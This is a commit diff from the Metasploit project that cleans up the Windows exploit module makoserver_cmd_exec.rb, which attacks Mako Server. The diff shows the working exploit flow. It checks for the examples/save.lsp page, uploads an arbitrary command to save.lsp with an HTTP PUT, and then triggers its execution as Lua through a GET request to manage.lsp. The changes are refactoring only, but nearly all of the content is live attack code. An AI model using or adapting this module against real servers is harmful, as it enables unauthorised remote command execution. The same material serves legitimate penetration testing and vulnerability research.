Land #9193, makoserver_cmd_exec cleanup

2017-11-10 10:36:16 -06:00 · 2017-11-10 10:36:16 -06:00 · 7b5ec9d0ec
parent 7595c7c627 ea260e87b7
commit 7b5ec9d0ec
1 changed files with 18 additions and 14 deletions
--- a/modules/exploits/windows/http/makoserver_cmd_exec.rb
+++ b/modules/exploits/windows/http/makoserver_cmd_exec.rb
@ -42,7 +42,7 @@ class MetasploitModule < Msf::Exploit::Remote

    register_options(
      [
-        OptString.new('URI', [true, 'URI path to the Mako Server app', '/'])
+        OptString.new('TARGETURI', [true, 'URI path to the Mako Server app', '/'])
      ]
    )
  end
@ -53,17 +53,17 @@ class MetasploitModule < Msf::Exploit::Remote
    # Send GET request to determine existence of save.lsp page
    res = send_request_cgi({
             'method' => 'GET',
-             'uri'    => normalize_uri(datastore['URI'], 'examples/save.lsp')
+             'uri'    => normalize_uri(target_uri.path, 'examples/save.lsp')
           }, 20)

    # If response does not include "MakoServer.net", target is not viable.
-    if res.headers['Server'] !~ /MakoServer.net/
+    if res.headers['Server'] !~ /MakoServer\.net/
      vprint_warning('Target is not a Mako Server.')
      return CheckCode::Safe
    end

    if res.body
-      if res.body =~ /Incorrect usage/
+      if res.body.include?('Incorrect usage')
        # We are able to determine that the server has a save.lsp page and
        # returns the correct output.
        vprint_status('Mako Server save.lsp returns correct ouput.')
@ -80,7 +80,7 @@ class MetasploitModule < Msf::Exploit::Remote
      return CheckCode::Unknown
    end

-    return CheckCode::Safe
+    CheckCode::Safe
  end

  def exploit
@ -99,12 +99,11 @@ class MetasploitModule < Msf::Exploit::Remote
      vprint_status('Sending PUT request to save.lsp...')
      send_request_cgi({
         'method'   => 'PUT',
-         'uri'    => normalize_uri(datastore['URI'], 'examples/save.lsp?ex=2.1'),
+         'uri'      => normalize_uri(target_uri.path, 'examples/save.lsp'),
         'ctype'    => 'text/plain',
         'data'     => cmd,
-         'http'   => {
-           'X-Requested-With' => 'XMLHttpRequest',
-           'Referer' => 'http://localhost/Lua-Types.lsp'
+         'vars_get' => {
+           'ex' => '2.1'
         }
       }, 20)
    rescue StandardError => e
@ -116,7 +115,12 @@ class MetasploitModule < Msf::Exploit::Remote
      vprint_status('Sending GET request to manage.lsp...')
      send_request_cgi({
         'method'   => 'GET',
-         'uri'    => normalize_uri(datastore['URI'], 'examples/manage.lsp?execute=true&ex=2.1&type=lua')
+         'uri'      => normalize_uri(target_uri.path, 'examples/manage.lsp'),
+         'vars_get' => {
+           'execute' => 'true',
+           'ex' => '2.1',
+           'type' => 'lua'
+         }
       }, 20)
    rescue StandardError => e
      fail_with(Failure::NoAccess, "Error: #{e}")